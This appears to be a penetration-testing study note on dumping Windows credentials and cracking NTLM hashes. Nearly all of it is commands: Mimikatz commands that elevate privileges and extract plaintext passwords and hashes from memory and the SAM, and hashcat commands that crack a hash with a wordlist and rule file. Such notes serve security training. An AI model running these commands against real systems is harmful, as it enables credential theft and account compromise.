# Crack NTLM Hashes

## Dumping NTLM hashes with Mimikatz

Using the sekurlsa module, we can attempt to extract plaintext passwords and password hashes from all available sources using:

```
sekurlsa::logonpasswords
```

We can also extract all NTLM hashes from the SAM using 

```
lsadump::sam
```

For this command, we must first enter 

```
token::elevate
```

to elevate to SYSTEM user privileges and we will need to SeDebugPrivilege access right enable, which can be accomplished using:

```
privilege::debug
```

## Cracking with Hashcat

Once we have the NTLM hash for a user, we can retrieve the correct hash mode from Hashcat's help output:

```bash
kali@kali:~/passwordattacks$ hashcat --help | grep -i "ntlm"   
                                                                            
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocol
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol
   1000 | NTLM
```

We now have everything needed to start cracking the hash.  The next step is to choose a wordlist and a rule file.  For example, we will use the rockyou.txt wordlist with the best64.rule rule file which contains 64 effective rules.

{% code overflow="wrap" %}

```bash
kali@kali:~/passwordattacks$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
```

{% endcode %}